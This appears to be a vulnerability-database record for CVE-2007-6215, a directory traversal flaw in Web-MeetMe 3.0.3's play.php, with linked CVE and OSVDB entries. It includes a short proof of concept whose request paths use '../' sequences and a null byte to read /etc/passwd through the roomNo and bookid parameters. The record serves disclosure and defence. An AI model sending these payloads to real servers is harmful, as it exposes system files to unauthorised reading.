{"id": "EDB-ID:4676", "hash": "d42196048e9686b2439ce492f695248d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Web-MeetMe 3.0.3 play.php Remote File Disclosure Vulnerability", "description": "Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability. CVE-2007-6215. Webapps exploit for php platform", "published": "2007-11-29T00:00:00", "modified": "2007-11-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/4676/", "reporter": "Evil.Man", "references": [], "cvelist": ["CVE-2007-6215"], "lastseen": "2016-01-31T21:30:11", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2016-01-31T21:30:11"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6215"]}, {"type": "osvdb", "idList": ["OSVDB:39697"]}], "modified": "2016-01-31T21:30:11"}, "vulnersScore": 5.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4676/", "sourceData": "/--------------------------------------------------------------------------\\\n|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability |\n|Download Script : |\n| http://sourceforge.net/project/showfiles.php?group_id=164788 |\n|POC : |\n| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00 |\n| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00 |\n|Discovered by : Evil.Man |\n|Home Page : Tryag.Com/cc |\n|Email : Evil.Man@windowslive.com |\n|Sp.Thanx To : GoLd_M [Mahmood_ali\"Tryag.Com\"] & Sniper-Sa.Com |\n\\--------------------------------------------------------------------------/\n\n# milw0rm.com [2007-11-29]\n", "osvdbidlist": ["39697"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "Multiple directory traversal vulnerabilities in play.php in Web-MeetMe 3.0.3 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) roomNo and possibly the (2) bookid parameter.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-6215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6215", "published": "2007-12-04T15:46:00", "title": "CVE-2007-6215", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "## Manual Testing Notes\n/play.php?roomNo=../../../../../../../../etc/passwd%00\n/play.php?bookid=../../../../../../../../etc/passwd%00\n## References:\nVendor URL: http://sourceforge.net/projects/web-meetme\nISS X-Force ID: 38772\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4676\n[CVE-2007-6215](https://vulners.com/cve/CVE-2007-6215)\nBugtraq ID: 26641\n", "modified": "2007-11-29T00:00:00", "published": "2007-11-29T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:39697", "id": "OSVDB:39697", "title": "Web-MeetMe play.php Multiple Variable Traversal Arbitrary File Access", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}